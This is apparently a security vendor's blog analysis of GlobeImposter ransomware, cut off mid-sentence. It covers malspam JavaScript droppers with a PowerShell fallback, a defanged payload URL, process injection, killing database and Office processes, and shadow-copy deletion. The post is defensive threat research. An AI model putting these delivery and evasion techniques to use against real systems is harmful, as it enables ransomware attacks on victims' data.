An analysis of GlobeImposter Ransomware by Quick Heal Security Labs
Credit to Author: Quick Heal Security Labs| Date: Fri, 11 Aug 2017 06:34:51 +0000
GlobeImposter Ransomware has been increasingly active and observed recently to be appending different suffixes to files it encrypt. A few patterns observed are using 3 random numbers such as “.492, .490, .725, .726, and .707”, random alphanumeric words such as “.p1crypt, .A1crypt, .BRT92, and .mtk118” and suffixes like “.OCEAN, .SEA, .ROSE, .ASTRA, and .DECODED”. Earlier, GlobeImposter Ransomware used to employee RDP (Remote Desktop Connection) hack only, but for the last couple of weeks, we have been observing it to be using malspam campaigns. Most script files observed in previous malspam campaigns used multiple URLs as backup to download the payload through Windows Script Host (WSH) and/or use of Powershell for evasion. The GlobeImposter propagation has been largely through Blank the Slate Malspam Campaign mostly featuring JS/VBS script files. Read more on Blank Slate Malspam Campaign We have observed several domains being used for delivering the malicious payload through the script files received by Quick Heal Security Labs. The payload on the malicious domains has been observed to vary and also seems to encrypt files with different suffixes. The domains observed in the script files are either compromised or are newly registered for malicious purposes. We have debugged heavily obfuscated malicious JS files for understanding the malicious code which is being used for the payload delivery. Below is one of the script files “31408.js” received from the malspam campaign for our analysis. Fig 1. Obfuscated JavaScript File Interestingly, the script had a fail-safe – an “Exception Handler”. The script file initially used Windows Script Host to deliver the payload, however, in case if there was an exception due to uncertain reasons it will invoke the exception handler which executes PowerShell to deliver the ransomware payload. Fig 2. De-obfuscated JavaScript Code The de-obfuscated code has a domain (marked in red as seen in figure 2) which is the same for both the main codes which used HTTP Get Request and the exception code which delivered the payload by PowerShell. Quick Heal Browsing Protection blocks the malicious URL and prevents the download of the payload. The code for the WSH downloaded the payload to, C:Users<user>AppDataRoaming MicrosoftWindowsTemplates{6_RandomNumbers}.exe, while in case the script file hits an exception the payload is downloaded to, C:Users<user>AppDataRoamingrnd.exe Furthermore, a minor mistake was observed in the PowerShell code. The code has a target download location ‘%appdata%rnd.exe’ which is supposed to be ‘%appdata%rnd.exe’. Thus, payload gets downloaded at “C:Users<user>AppDataRoamingrnd.exe” instead of inside the Roaming Folder giving the payload its name as Roamingrnd.exe instead of rnd.exe. When we executed the “31408.js”, the GlobeImposter payload was downloaded from “hxxp://foolerpolwer.info/admin.php?f=3”. In our test environment, the downloaded file name was 725947.exe. As seen from the image below, the script file put up an HTTP request to the malicious domain, which received a PE file (Executable) with the filename “3”. The file is further renamed and moved to the below location and the new file name is generated using Math.Random() function as seen in fig 2. Fig 4. HTTP Request/Response for Payload When the dropped payload is executed, it de-obfuscates the malicious code inside memory from its resource section and is responsible for carrying out the ransomware activity. It further creates a child process with “CREATE_SUSPENDED” flag, does memory code injection with de-obfuscated code using ‘WriteProcessMemory’ and resumes the thread/process. Fig 5. Creation of child process with CREATE_SUSPENDED Flag. Before the encryption activity begins, the injected process executes a routine where it terminates the processes: outlook, ssms, postgre, 1c, SQL, excel, and word using taskkill. Terminating the above applications gives the payload access to more files as the files held by the processes are released. Fig 6. De-Obfuscated PE File in Buffer address dump In order to explain the malware execution, we have put up a process tree for the GlobeImposter Ransomware payload after execution. As mentioned earlier, we can see that after the script downloads the payload which invokes a child process. Fig 7. GlobeImposter Execution Process Tree The child process also drops a batch file which is executed after the encryption activity is completed. The batch file observed in our test environment “__t8D.tmp.bat” is responsible for deleting Volume shadow copies, Remote Desktop information stored in system registries and the file present at %UserProfile%DocumentsDefault.rdp. The…
http://blogs.quickheal.com/feed/